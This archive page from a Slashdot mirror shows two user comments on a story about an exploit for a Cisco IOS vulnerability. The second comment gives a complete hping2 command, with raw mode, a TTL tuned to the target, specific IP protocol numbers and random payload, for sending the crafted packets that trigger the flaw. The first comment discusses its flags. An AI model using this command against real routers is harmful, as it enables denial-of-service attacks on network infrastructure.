Slashdot Mirror


User: SonicRaT

SonicRaT's activity in the archive.

Stories
0
Comments
2
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 2

  1. Re:Easy way to do it.. on Exploit Available for Cisco IOS Vulnerability · · Score: 1

    gee, a little bit like mine wouldn't you say? Especially using /dev/urandom with 128 as the data size. and you're missing -0, and some releases won't use H unless -0 is specified for raw mode.

  2. hping2 exploit on Exploit Available for Cisco IOS Vulnerability · · Score: 1

    For those of you who are attempt to workaround this, and happen to have hping2, here's how to do it. To get the TTL, just ping the destination and subtract from 255, for instance a ping with TTL 251, you'd enter 4. Choose which protocol to use of the four.

    hping2 (dest ip) -0 -t (ttl from above) -H (53,55,77, 103) -d 128 -E /dev/urandom